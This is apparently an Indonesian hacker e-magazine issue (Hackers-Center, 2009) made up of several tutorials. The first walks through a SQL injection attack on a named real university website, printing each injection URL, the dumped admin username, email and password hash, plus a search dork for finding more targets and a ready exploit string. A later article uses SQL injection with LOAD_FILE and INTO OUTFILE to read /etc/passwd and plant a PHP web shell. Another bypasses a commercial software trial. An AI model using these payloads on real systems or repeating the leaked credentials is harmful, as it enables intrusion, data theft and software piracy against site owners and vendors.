Writer : Xyberbreaker (a.dwisatya@yahoo.com) Ok, ketemu lagi ama aku, semoga gak bosen ya.... kali ini q bakal nunjukin cara hack salah satu situs perguruan tinggi di Indonesia Tool: 1. Mozilla 2. Notepad 3. HexConverter ( download di http://peretas.freeforums.org/download.php?id=14 password: vires) kalo gk bisa, daftar dulu.. hehe.. Pertama, cari target Misal: http://www.nwu.ac.id Kedua, cari bug nya Misal:http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1 Ketiga, cek apakah ada kutunya Jadinya:http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1' Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/nwuaci/public_html/stikes/mod/publisher/publisher.php on line 213 ok berarti kutunya ada... Keempat, mulai beraksi... kita pake perintah order http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+1 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+2 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+3 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+4 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+5 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+6 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+7 <---gak ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+8 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+9 <---gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+10 <--gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+11 <--gak ada error http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+12 <--ada error Ok, kita tau kalo web itu ada 11 kolom Kelima, kita pake perintah union buat munculin Adwisatya mAgic Number hehe.... http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11-ok, nomor yang muncul n paling jelas no 4 Keenam, cek versinya pake @@version http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11-ok, kita liat 5.0.67-community Mode girang [on] Ketuju, kita cari tau nama tabel pake group_concat(table_name) from information_schema.tables+where+table_schema=database() http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1+union+all+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11from information_schema.tables+where+table_schema=database() akbid_authors,akbid_banner,akbid_bannerclient,akbid_bannerfinish,akbid_bukutamu,akbid_counter, akbid_lblocks,akbid_main_page_content,akbid_menu,akbid_mod_calendar_category,akbid_mod_cal endar_events,akbid_mod_calendar_location,akbid_mod_calendar_post,akbid_mod_calendar_setting s,akbid_mod_calendar_subcat,akbid_mod_diskusi,akbid_mod_diskusi_ca keliatankan??? hm... kayaknya ada yg berharga akbid_authors Kedelapan, kita cari tahu nama kolom dalam tabel akbid_authors pake group_concat(column_name) from information_schema.columns+where+table_name=ox(hex nama tabel) http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11%20from%20information_sche ma.columns+where+table_name=0x616B6269645F617574686F7273 ok, kelihatan kan?? aid,name,url,email,pwd,counter
Kesembilan, kita lihat isi dari kolom diatas... http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1+union+all+select+1,2,3,group_concat(namakolom),5,6,7,8,9,10,11%20from namatable jadinya : http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1+union+all+select+1,2,3,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),5 ,6,7,8,9,10,11%20from%20akbid_authors jelas nih : admin:Webmaster:http://www.nwu.ac.id:nwuaci@nwu.ac.id:626c0a253fd6a1d13d4358eec31f14b4: 7 admin = username untuk login Webmaster = status nwuaci@nwu.ac.id = email admin (kalo mau ngasih tau, tapi udah telat, coz udah q kasih tau) 626c0a253fd6a1d13d4358eec31f14b4 = password dalam md5 crck di http://thesoftwareengineer.org/services/md5.php Kesepuluh, login jadi admin http://www.nwu.ac.id/admin Kesebelas.... tunjukkan xpresi lo... devil mode [on]
Tambahan: untuk mencari target: inurl:"mod.php?mod=publisher Exploit: 13%20union%20select%201,2,3,4,5,6,group_concat(aid,0x3a,name,0x3a,email,0x3a,pwd),8,9,10,11% 20from%20authors-13%20union%20select%201,2,group_concat(aid,0x3a,name,0x3a,email,0x3a,pwd),4,5,6,7,8,9,10%20f rom%20authors-pilih salah satu, jika masih tidak bisa... lakukan seperti langkah - langkah diatas..
Thanks: JatimCrew, vires, elfata, Spy_kit33
IP Command
Mengenal IP Command pada CMD
Writer : ciebal (ciebal@mugi.or.id) MS DOS Promt atau biasa kita kenal dengan CMD memang terkenal dengan tampilan yang polos tapi masih banyak digunakan para Hacker di dunia untuk melakukan aksinya. Kali ini gw coba berbagi sedikit pengatahuan lagi tentang perintah-perintah yang berhubungan jaringan yang biasa digunakan para Hacker untuk mengetahui informasi computer/server target dan milik kita sendiri, berikut perintah-perintahnya (sebelumnya aktifkan CMD) : ipconfig/all Berfungsi untuk menampilkan informasi konfigurasi koneksi, seperti Host Name, Primary DNS type, Ethernet Adapter LAN. ipconfig/displaydns Berfungsi untuk menampilkan DNS Cache ipconfig/flushdns Berfungsi untuk menghapus DNS Cache ipconfig/release Berfungsi untuk menghapus semua koneksi IP address ipconfig/renew Berfungsi untuk membuat IP address baru ipconfig/registerdns Berfungsi untuk melakukan refresh DNS dan meregister kembali koneksi DNS ipconfig/showclassid Berfungsi untuk menampilkan informasi DHCP Class Ipconfig/setclassid Berfungsi untuk mengubah DHCP Class ID control netconections Berfungsi untuk membuka jendela Network Connection ping Berfungsi untuk melakukan test koneksi ke suatu situs atau IP Address tertentu, contoh ping www.google.com
tracert Berfungsi untuk menampilkan informasi IP Address route netstat Berfungsi untuk menampilkan informasi koneksi TCP/IP yang sedang aktif route Berfungsi untuk menampilkan local route hostname Berfungsi untuk menampilkan nama computer Mungkin masih banyak lagi perintah-perintah yang bisa dilakukan, tapi karena pengetahuan gw yang terbatas jadi lo cari sendiri aja yah. Gw harap dengan sedikit pengetahuan ini kita bisa tau hal kecil tapi sangat penting untuk diketahui untuk menjadi ahli security atau hacker. (tapi gw ngomong kayak gini bukan berate gw dah jago yah, Cuma kebetulan gw pengen nulis tentang hal ini aja). Referensi : eBook dari www.klik.to, Cuma gw tulis ulang dengan bahasa sendiri.
Virus Section
Knowledge, History, Type of Virus, etc
Writer : ramz (rama_games@yahoo.com) Knowledge.
V
History
Virus merupakan program yang sengaja dibuat oleh manusia tujuannya untuk merusak system yang ada pada computer. Program ini memiliki kemampuan untuk mengandakan diri, merusak system, mengubah konfigurasi system, dan masih banyak lagi. Umunya virus hanya dapat merusak software tapi tidak menutup kemungkinan hardware akan rusak apabila suatu computer dipaksa untuk melakukan pekerjaan yang sangat berat. Umumnya virus yang beredar di dunia IT adalah virus yang menyerang computer berbasis Windows, tetapi OS yang lainnya belum tentu terbebas dari virus. Berikut adalah data dari sumber terpercaya (95% Windows, 2% Linux, 1% Mac OS X, 2% FreeBSD)
Virus computer pertama kali digunakan oleh Fred Cohen untuk papernya yang berjudul Computer Viruses Theory and Experiments. Pada papernya ia menerangkan bahwa sifat dasar virus komputer yaitu: mempunyai kemampuan untuk menjangkiti (menginfeksi) program lain dan menyebar. Pada dasarnya penggunaan isitlah virus dikarenakan adanya kesamaan dalam hal sifat antara virus komputer dengan virus yang kita kenal dalam dunia fisik. Di mana keduanya memiliki dua tujuan yaitu: untuk bertahan hidup dan bereproduksi. Berikut merupakan perkembangan virus dari tahun 1981 2004.
1949, Teori Self-Replicating Program (Program Yang Dapat Menggandakan Diri) Pertama Kali Diperkenalkan. 1981, Virus Komputer Pertamakali Yang Menyerang Sistem Operasi Apple 2 Muncul Dan Menyebar Melalu Program-Program Game Komputer Bajakan Di Texas. 1983, Fred Cohen Mengimplementasikan Definisi Baku Bagi Virus Komputer. 1986, Virus Boot Sector Pertama Kali Ditemukan, Virus Ini Menyerang PC (Personal Computer) Dengan Nama Virus Brain Dibuat Oleh Dua Orang Programmer Dari Pakistan Bernama Basit Dan Amjad. Pada Tahun Ini Juga Diperkenalkan Pertama Kalinya Virus Yang Mampu Menginfeksi File, Diberi Nama Virdem (Virus Demo) Dibuat Di Jerman. 1987, Virus Yang Mampu Menginfeksi Dua Jenis File .COM Dan .EXE Ditemukan Di Universitas Hebrew Israel. Virus Ini Bernama Jerusalem Dan Masih Memiliki Kesalahan (Bug) Yang Menyebabkan Virus Menginfeksi Ulang (Reinfection) File Yang Telah Terinfeksi Sebelumnya. Pada Tahun Ini Pula Virus Stoned Dan Vienna Ditemukan, Virus Stoned Mampu Menginfeksi MBR (Master Boot Record) Dan Dibuat Oleh Seorang Pelajar Di Universitas Wellington New Zealand, Sedangkan Virus Vienna Dibuat Oleh Seorang Pelajar Menengah Di Austria. 1989, Kemunculan Virus Dari Bulgaria Bernama Dark Avenger Dibuat Oleh Seseorang Yang Mengaku Dirinya Dark Avenger. Virus Ini Merupakan Jenis Virus Yang Menyerang Antivirus. Pada Tahun Ini Pula Virus Yang Hackers-Center 2009 HC eMagazine Vol. 01
Menginfeksi File .EXE Dengan Kemampuan Stealth Ditemukan, Virus Ini Bernama Frodo Dan Akan Melakukan Perusakan Hardisk Apabila Virus Berjalan Setelah Tanggal 22 September Setiap Tahunnya. 1991, Virus Indonesia Pertamakali Ditemukan, Virus Ini Bernama Den Zuko Dan Terdapat 2 Varian. Virus Ini Dibuat Oleh Denny Yanuar Ramadhani Dari Bandung Indonesia. Virus Ini Mampu Menghapus (Disinfect) Disk Yang Telah Terinfeksi Oleh Virus Brain. Hal Ini Menjadi Bukti Adanya Virus Komputer Yang Menyerang Virus Komputer Lain. Pada Tahun Ini Pula Virus Bernama Tequila Lahir, Virus Ini Memiliki Kemampuan Stealth, Polymorphic, Multipartition Dan Juga Anti-Antivirus. 1992, Virus Boot Sector Dengan Nama Michelongelo Berhasil Menginfeksi Lebih Dari 5 Juta Komputer Di Seluruh Dunia. Pada Tahun Ini Pula VCL (Virus Creation Laboratory) Pertama Kali Tercipta,.VCL Merupakan Tool Kit Yang Dapat Untuk Membuat Virus Komputer Secara Instan, Artinya Virus Bisa Dibuat Oleh Siapa Saja Tanpa Membutuhkan Pengetahuan Pemrograman Dari Pembuatnya. 1994, Virus Dengan Nama Pathogen Muncul Di Inggris. Virus Ini Memiliki Kemampuan Polymorphic, Dibuat Oleh Seorang Yang Mengaku Bernama Black Baron, Sang Pembuat Berhasil Tertangkap Dan Dipenjara. 1995, Virus Makro Tercipta Yang Pada Waktu Itu Mulai Menginfeksi Dokumen Jenis Microsoft Word. 1996, Virus Makro Yang Menginfeksi File-File Office Word Dan Excel Tercipta. 1997, Terdapat Kurang Lebih 12000 Virus Baru Tercipta Dan Tersebar Di Seluruh Dunia. 1998, Virus Benama Strangebrew Membuktikan Akan Virus Yang Mampu Menginfeksi File Java. Java Sendiri Merupakan Platform Yang Pernah Di Bangga-Banggakan Akan Predikat Bebas Virus-Nya. Pada Tahun Ini Pula Dua Anak Umur Belasan Dari California Berhasil Membobol Dan Mengendalikan Sekitar Lebih Dari 500 Sistem Komputer Pemerintahan Dan Militer Di Amerika. 1999, Virus Makro Dengan Nama W97M/Melissa Hadir. Virus Ini Mampu Menyebarkan Dirinya Melalui Pesan Elektronik (E-Mail) Dan Berhasil Menginfeksi Kurang Lebih 1 Juta Komputer Di Seluruh Dunia. Di Lain Tempat Virus CIH Menyebar Cukup Pesat Di Korea Dan Menyebabkan Kerugian Finansial Kurang Lebih US $ 250 Juta, Virus CIH Sendiri Merupakan Virus Yang Memiliki Kemampuan Untuk Merusak Hardware Dengan Cara Mengoverwrite BIOS. 2000, Virus ILOVEYOU (Love Bug) Yang Mirip Dengan Virus Melissa Menyebar Lewat Email Dan Memilik Aksi Menghapus Beberapa File Multimedia Seperti .MP3, .MP2 Dll. Virus Ini Memiliki Kemampuan Untuk Mencuri Informasi Berharga Korban Yang Terinfeksi Dan Mengirimkan Kepada Pembuatnya. 2001, Worm Dengan Nama Codered Berhasil Menginfeksi Lebih Dari 300.000 Komputer Di Seluruh Dunia Dan Mengakibatkan Kerugain Sebesar Kurang Lebih US $ 2.5 Milyar. 2002, Pembuat Virus W97M/Melissa Tertangkap Oleh Pihak Federal Dan Dikurung Selama 20 Bulan. Pada Tahun Ini Pula Muncul Worm Bugbear Yang Memiliki Beraneka Macam Tehnik Infeksi Dengan Beberapa Metode Yang Kompleks Dan Juga Kelahiran Worm Nimda (Merupakan Aksara Terbalik Dari Kata Admin) Dan Klez.
2003, Merupakan Tahun Kejayaan Worm. Worm Dengan Nama Slammer Tercipta Dan Berhasil Menginfeksi Tidak Kurang Dari 75.000 Komputer Di Seluruh Dunia Dalam Waktu 10 Menit Setelah Tercipta. Worm Ini Memiliki Kecepatan Reproduksi Dan Penyebaran Tercepat Yaitu 8.5 Detik/Worm. Pada Tahun Ini Pula Worm Sobig Lahir Dan Merupakan Worm Yang Mampu Melakukan Aktifitas Spam Besar-Besaran, Setiap E-Mail Yang Dikirimkan Akan Memiliki Nama Pengirim <! Var Prefix = Ma + Il + To; Var Path = Hr + Ef + =; Var Addy15158 = Big + @; Addy15158 = Addy15158 + Boss + . + Com; Document.Write( ); Document.Write( Addy15158 ); Document.Write( ); // >\N Big@Boss.Com <! Document.Write( ); //> Email telah dilindungi dari Spam Bots, Anda harus mengaktifkan Java untuk dapat melihatnya <! document.write( ); //> , Worm Yang Memiliki Pangkat MM (Mass Mailer) Ini Telah Mengakibatkan Kerugian Ekonomi Sebesar US $ 29.7 Miliar. Belum Lagi Selesai Terror Worm Sobig, Muncul Lagi Worm Blaster Yang Menyerang Servis RPC (Remote Procedure Call) Pada Sistem Operasi Windows, Worm Yang Pernah Membuat Pihak Microsoft Kalang Kabut Ini Memiliki Kecepatan Penyebaran 4000 Infeksi/Jam. 2004, Worm Dengan Nama Mydoom Merajai Pervirusan Dunia Dengan Tingkat Infeksi Yang Tinggi Dan Menguasai 30% Bandwidth Yang Digunakan Internauts (Pengguna Internet) Di Seluruh Dunia. Worm Yang Menyandang Rating High Risk Dari Beberapa Vendor Antivirus Ini Memiliki Daya Hancur Yang Lebih Hebat Dari Worm Sobig Dan Welchia, Selain Itu Worm Ini Juga Melakukan Serangan Ddos (Distributed Denial Of Service) Ke Situs Www.Sco.Com Dan Www.Microsoft.Com Dan Juga Memblok Beberapa Situs Antivirus
Kriteria Virus
Menurut y3dips [salam kaka ]. Ada 5 kriteria, dan apabila semua melengkapi barulah program tersebut dapat dikatakan virus . Kriteria tersebut adalah : 1. Kemampuan untuk mendapatkan informasi. Informasi dalam hal ini adalah informasi tentang keadaan computer tersebut ( program apa yang rentan di serang, bagaimana system keamanannya ). Kemampuan memeriksa suatu program. Dalam penularan / penyerangan virus tersebut harus tau apakah file dengan ekstensi ini sudah siap untuk diserang/tulari, belum siap untuk diserang/tulari, atau bahkan sudah diserang/tulari ? Kemampuan menggandakan diri. Bukan virus namanya kalo gak bisa menggandakan diri. Hal ini merupakan hal terpenting dalam criteria virus. Biasanya cara tersebut adalah : a. Menulari file / program setelah itu menghapus / merename file aslinya. b. Menumpangi seluruh file / program yang ada apabila virus tersebut sudah di load. Kemampuan untuk manipulasi. Umumnya virus pada OS Windows memanipulasi registry, dan melakukan perubahan setting. Hal ini sudah dapat menjelaskan kemampuan untuk manipulasi. Kemampuan untuk menyembunyikan diri / kamuflase. Kamuflase / penyembunyian juga merupakan hal yang terpenting, apalagi jika kita berbicara soal Anti Virus, namun memang hal ini yang digunakan untuk mengelabui antivirus.
2.
3.
4.
5.
JENIS JENIS VIRUS Jenis jenis virus yang sering beredar di dunia computer adalah sebagai betikut : Virus Boot Sector : Virus ini sudah langka, namun sangatlah berbahaya. Karena virus ini menginfeksi boot sector, yang merupakan sesuatu yang dibaca pertama kali oleh system operasi pada saat computer sedang diakses. Sehingga pada saat booting virus menetap di memory dan dapat langsung melaksanakan aksinya pada penyerangan ke media penyimpanan yang lain [disket, flashdisk, dll] yang terhubung ke computer tersebut. Virus File : Jenis virus ini adalah jenis yang virus yang paling banyak kita jumpai. Jenis file untuk virus ini adalah jenis file dengan type execution [.exe / .bat / .vbs / .com]. Tingkat bahaya dari virus ini tergantung ke kreatifan programmer dalam membuat virusnya, sehingga tidak dapat di tentukan tingkat bahaya virus ini. Biasanya virus ini melakukan perintah perintah penghapusan data, penggantian value pada suatu data sehingga bersifat fatal, penyerangan terhadap registry, dan lain lain. Virus Macro : Virus ini terbentuk ketika windows memberikan fitur baru yang memudahkan penggunanya tetapi disalahgunakan sehingga terbentuklah lagi virus baru yakni virus makro. Okey, kita cari kembali arti dari makro adalah perintah yang mirip dalam bahasa pemrograman yang disediakan oleh perangkat lunak untuk melakukan suatu pekerjaan tertentu. Multi Partition Virus Virus program dan virus boot yang ganas, dengan cara kerja menginfeksi suatu program kemudian setelah terinfeksi virus tersebut dijalankan yang menyebabkan penyerangan virus terhadap boot sector. Pendeknya virus ini adalah gabungan dari Virus File dan Virus Boot Sector. Stealth Virus Banyak pendapat tentang virus ini ada yang berpendapat demikian mengalihkan Virus ini akan
menguasai tabel tabel interupt pada DOS yang sering kita kenal dengan "Interrupt interceptor". virus ini berkemampuan untuk mengendalikan instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya . Kesimpulannya adalah Stealth Virus menggunakan banyak cara untuk mengamankan dirinya agar tidak terdeteksi oleh antivirus / pengguna computer. Polymorphic Virus : Jenis virus ini cukup brilliant, dengan cara mengenkripsi dirinya, dengan cara tersebut virus tersebut dapat lolos dari pendeteksian antivirus.
MEDIA PENYEBARAN VIRUS Eitss... Virus ga tiba tiba nongol di PC kita loh, kecuali kita yang buat Tapi suatu virus memanfaatkan media untuk melakukan aksinya. Disini akan dibahas sedikit tentang media yang digunakan untuk menyebarkan virus.
Media external : Media external adalah media yang paling sering digunakan oleh pengguna computer. Terutama media yang bersifat R / W atau Read Write. [ Flashdisk, Disket, CD RW, Hardisk External, MMC, dll] Media Jaringan : Media jaringan merupakan media yang memungkinkan terjadinya pertukaran data antara penggunanya. Dengan pertukaran data itulah letak kemudahan virus untuk menyebarkan dirinya. [ LAN. WAN. MAN ] Media Online : Banyak media online yang dapat di inject malcode, salah satunya adalah WWW. Mungkin celah eksekusi VBScript pada Internet Explorer sudah di tutup, tapi masih ada kemungkinan seiring perkembangan IT. Media Attachment / Download File: Melalui attachment atau download file tidak menutup kemungkinan file yang anda download adalah sebuah virus / aplikasi jelmaan virus. Sehingga dalam mendownload suatu file [terutama program] harus jelas asal usul file tersebut.
PENCEGAHAN VIRUS : Satu hal yang harus diingat Virus ada karena media Nah, media tersebutlah yang harus kita antisipasi agar tidak terjangkiti virus. Okey sekarang ada beberapa cara untuk mengantisipasi hal tersebut Biasanya. Biasanya loh ya. Virus menyebar melalui media dengan cara : 1. File autorun.inf File ini adalah loader yang di letakkan di setiap root pada suatu drive. Antisipasi : Buatlah folder autorun.inf di setiap root drive pada media yang anda gunakan. Alternatif lain. Masuklah ke CMD lalu ketikkan assoc .inf=textfile 2. File desktop.ini Sama halnya dengan autorun.inf tetapi bedanya adalah biasanya file desktop.ini berkoordinasi dengan file folder.htt. Antisipasi : Buatlah folder desktop.ini di setiap root drive pada media yang anda gunakan. Alternatif lain. Masuklah ke CMD lalu ketikkan
assoc .ini=textfile assoc .htt=textfile
Ending. Bacaan ini adalah bacaan ringan yang hanya dikhususkan bagi newbie, mohon maaf apabila ada kesalahan dan kesan sok menggurui dalam bacaan ini. Writer Support Source : : : ramz GOD | HC STAFF | ALL OF MY FRIEND Virus article made by : y3dips Filez Magazine
Guitar Pro 5.2 Demo Version

Ternyata Ada Pintu Yang Lupa di Tutup...
Writer : EiGhtTailz (Ekor_Delapan@yahoo.com)
A Little Word Hhuft akhirnya bisa juga nulis artikel buat HC eMagazine Moga-moga aja tulisan gw ini bisa nampang di edisi Perdana (Ngarep mode = On) . Niatnya sih gw mw masukin artikel ttg Cracking, Hacking n lainnya, but coz waktunya udah mepet, gw takut aja g bisa nyumbang buat edisi 1, kan sebagai member aktif HC gw g boleh ketinggalan donk!!, kontribusi gw mana?? (deuh,, gaya lo udah kyk Contributor ae), Member yg laen juga g boleh ketinggalan yah.. Keep Share n Learn.. Sekilas tentang Guitar Pro Dari namanya aja kalian udah pada tau donk software buat apa?? Yupz bener bgt!! Guitar Pro adalah software yg dipergunakan untuk membaca tabulasi gitar dalam file yg berformat .midi , membuat tabulasi gitar sendiri juga bisa, n masih banyak lagi hal yg bisa dilakukan. Gw dapet software ini dari temen gw yg pada doyan maen band n doyan Gigitaran (bahasa apaaaan tuh?? Aneh), Akhirnya gw minta aja nih software n langsung ditaro di FD gw,, setelah gw install di rumah.OMD ( OhMy Dog!!) ternyata Cuma trial version.anjrit gw di kibulin #!%$*@ .katanya software bagus masa trial version.cape deh.Langsung aja gw kirim Semeses (SMS) ke temen gw yg ngasih software ( si Billie Jay). E.T : Eh bro.Serial Numbernye mane?? Kok Cuma trial c? ah lo tega banget ngibulin gw. B.J : Oiya Sorry Bos .Aim Proget Coy!! Ntu Cuma demo Version, lo Registerin deh sekalian,, kan lo jago computer tuh ( Narsis mode = On ), or lo crackingin kek.ntar kalo udah bisa kasih gw yahWkekeke E.T : Asem bener dah..nyusahin ae lo curut!! Ntar gw usahain deh.tapi keknya butuh proses laman ntu juja kalo bisa.makanya ntar malem lo solat tahajud, doain gw supaya bisa ngadalin nih softwarehehe. B.J : Lahdoain emak gw aja jarang..ngapain juga doain locape deh!!
.......:::......End of Story.......:::........
Let`s the Show Begin.... Gw ambil FD gw trus gw colok deh di kompie gw.....buka file setup....Install dah ......
Setelah proses install yg tidak banyak memakan waktu..... tapi ngebetein....... sampailah kita didalam program Guitar Pro......
Kalo menurut gw keren lah tampilan nya.... Kombinasi Pink yg cantik....But,, Nah loh...... Bener kan kata gw??? Cuma trial...........asem bener dah............... Liat neh...........
Cuma dikasih 15 hari coy......pelit banget dah tuh programmer......coba dikasih 15 tahun.....wkekeke...... ; P Akhirnya gw coba klik tuh tombol Order! N ini yg kluar.....
Wadoh...... kayaknya kalo mau registrasi harus bwa kompie gw ke warnet,, cape deh....udah gitu disuruh bayar lagi.....ogah beud.....Terbersit di otak gw buat cracking nih software.....Gw otak-atik semaleman pake ollydbg... g ketemu2.....mpe akhirnya gw pusing sendiri, entah databasenya di encrypt or emang gw nya aja katro.....maklum lah baru belajar cracking disuruh crack software yg versi 5, jelas udah banyak yg di patch.....nyerah gw dah........ Mpe akhirnya beberapa hari setelah musibah itu (gagal crack), gw mampir ke hoz temen gw lagi, abis bete di hum liat kompie mulu, mo maen cewe but g punya ( ngiri gw ma yg punya pacar), gw curhat aja ma temen gw....
E.T : Jay, gw gagal neh....Bingung gw....algoritmanya g ketemu2.....mungkin nti kalo gw udah jago....nyerah gw...... B.J : Ah payah lo ah....katanya jago!! ( Sedih bgt gw digituin..... ) E.T : Sini gw pinjem kompie lo... Akhirnya gw megang kompie dy...gw buka lagi tuh software sialan ( Guitar Pro, abis gw kesel ),, eh punya dy udah kadaluarsa alias end of trial version.... Biz ntu gw lepas tuh kompie n gw tiduran di kasur dy...( hayah,, jgn mikir mesum ya....) gw mikir2 How should I do ??? ,, masih terus berpikir n gw baru inget kalo ngebuka or ngejalanin file tuh bisa dilakukan dengan beberapa cara, n gw juga pernah baca disebuah artikel tentang pintu yg lupa ditutup oleh programmernya , jalan pertama yg gw coba adalah klik kanan pada GP lalu Run as,
Kita lihat apa yang terjadi,, n benar saja, Guitar Pro kembali lagi pada saat awal trial version....
Aneh kan?? Padahal sudah jelas sebelumnya,, end of trial version... Ini nyata....ternyata pintu Run as lupa ditutup oleh sang programmer, haduh parah juga ya.....ternyata dengan trik simple software ini bisa di kadalin, cape juga gw kalo gini caranya, udah susah2...hhuft....
Ini bisa dijadikan pembelajaran oleh kita semua yg ingin membuat software berbayar, perhatikan pintu2 yg ada apakah sudah cukup aman??, n untuk para nubie kayak gw, pasti banyak yg bertanya, Q : Om2, cara jadi hacker tuh gimana seh?? biasanya kita bingung sendiri ngejawabnya, A : ya loe belajar script, bahasa pemograman, n De EL EL yg pasti bikin org pusing duluan... Padahal sesuatu pemikiran yg besar ntu asalnya dari yang sederhana dulu, belajarlah selangkah demi selangkah, step by step, gunakan logika, pasti ada aja kok jalannya, contohnya ya kayak gw ini, udah mikir jauh2 ternyata jawabannya depan mata nyesek kan???
~~~~~~~~~End Of Trick~~~~~~~~~
--^One Step Closer^--
/Nick /Location /YM /No. HP /Website
: EiGhtTaiLz : Klapanunggal kab. Bogor - Depok : Ekor_Delapan (jgn lupa di add ya) : PM gw aja.... : Baru belajar bikin, ntar kalo jadi gw kasih tau
Pesen2 ah :
HC : moga eksis selalu, moga eMagaZine tetap bertahan walaupun masih segede toge, Member : eksis terus donk, jgn absent mulu, minimal 1 minggu sekali maen ke HC apa susahnya, mari kita buat HC jadi salah satu forum underground yg terpandang di negeri ini, Momod Proyek : Angkat topi deh buat lo Bal,, but jgn lupa artikel gw di muat di vol 1 ya awas lo kalo kagak, Poprats : Mane aje lo rats, gimana ngeband kemaren? Sukses g dapet bini baru? Jenny : we were made for each other, i`m here forever, I know we were....... : Allah SWT who gave my Brain to thinking... My Parents My Brother n My Lovely Cat Sapi My Laptop Toshiba - Pent. 3 - 40gb - 128ram
Thx to
X-CODE magazine Ryodan Genk : Ajay, Billie Jay, Ebenk, Malique, YuLizt Tenro Hakuya n Toke aka chaer.newbie
Dari gue : I.A.M | Ryodan Leader aka EiGhtTaiLz
...:::...Hidup adalah Pilihan...:::... ...:::...yang Kuat kan Bertahan, yang Lemah Berantakan...:::... ...:::...Itulah Kenyataan, sekeras apapun kau tuk Menyangkalnya...:::...
Advanced SQL Injection

[Test On Windows XP]
Writer : eminem (outsiders8@gmail.com)
Di tehnik ini saia akan mencoba melakukan serangan sql injection dan memasang shell di dalam situs dengan menggunakan syntax SQL. Untuk mengetahui apakah tehnik ini dapad berjalan di sebuat situs adalah dengan memasukan perintah LOAD_FILE(/boot.ini) pada magic number, perintah ini di gunakan pada OS win karena maksud dari perintah ini adalah membuka file boot.ini yang ada di dalam win apabila di linux gunakanlan LOAD_FILE(/etc/passwd) . Masukanlah perintah tersebut ke dalam magic number sehingga url nya menjadi seperti ini
Nb : apabila magic_quotes_gpc di dalam situs posisi ON anda tinggal merubah ascii ke HEX atau DECIMAL [lihat gambar di bawah]
Untuk perintah HEX : http://localhost/pentest/index.php?id=-9%20union%20select%201,load_file(0x2F626F6F742E696E69),3,4,5--
untuk perintah DECIMAL: http://localhost/pentest/index.php?id=9%20union%20select%201,load_file(char(47,98,111,111,116,46,105,110,105)),3,4,5--
tapi di sini magic_quotes_gpc dalam posisi OFF jd saia menggunakan perintah ini http://localhost/Pentest/index.php?id=-9%20union%20select%201, LOAD_FILE(/boot.ini),3,4,5
Bingo maka file boot.ini yang ada di dalam windows akan terbuka pada browser , ok sekarang kita akan mencari di mana kah letak dari file index.php situs ini berada, karena saia di sini akan mencoba memasang shell pada dir -Nya tersebut. Untuk mencari di mana letak letak directorynya bias lihat file phpinfo.php atau php.ini dan carila file yang bernama DOCUMENT_ROOT - C:/xampp/htdocs yaps berarti bisa kita artikan bahwa file root terletak di C:/xampp/htdocs dan file index.php terdapat di C:/xampp/htdocs/Pentest/index.php ok sekarang coba masukan perintah LOAD_FILE(C:/xampp/htdocs/Pentest/index.php) sehingga ulr akan menjadi seperti ini Hackers-Center 2009 HC eMagazine Vol. 01
http://localhost/Pentest/index.php?id=9%20union%20select%201,load_file(%27c:/xampp/htdocs/Pentest/index.php%27),3,4,5--
Ok sudah terlihat,di sini terlihat file index.php dari directory Pentest sekarang sudah sampai pada saat pemasangan file PHP yang dengan menggunakan perintah <?include($_GET["cmd"]);?> yang di isikan pada magic number dan perintah into outfile /xampp/htdocs/Pentest/error.php pada akhir guna dari perintah itu adalah membuat file error.php yang berisikan <?include($_GET["cmd"]);?> sehingga urlnya seperti ini:
http://localhost/Pentest/index.php?id=9%20union%20select%201,%27%3C?include($_GET[%22cmd%22]);?%3E%27,3,4,5%20into%20outfile%20%2 7/xampp/htdocs/Pentest/error.php%27--
kita sudah berhasil membuat file error php dan memasukan bug RFI di dalamnya. Sekarang coba anda akses shell tersebut dengan memasukan url seperti ini
http://localhost/pentest/error.php?cmd=http://localhost/pentest/shell.txt?
Evilcode = http://localhost/pentest/shell.txt?
Dan lihatlah hasil apa yang anda dapatkan
Bingo sekarang shell sudah tersedia hehehehe..
Thanks to : Allah Swt. My mom , My dad & My brother Mainhack Brotherhood Serverisdown
XSS Attack
Deface Web Tanpa Merusak
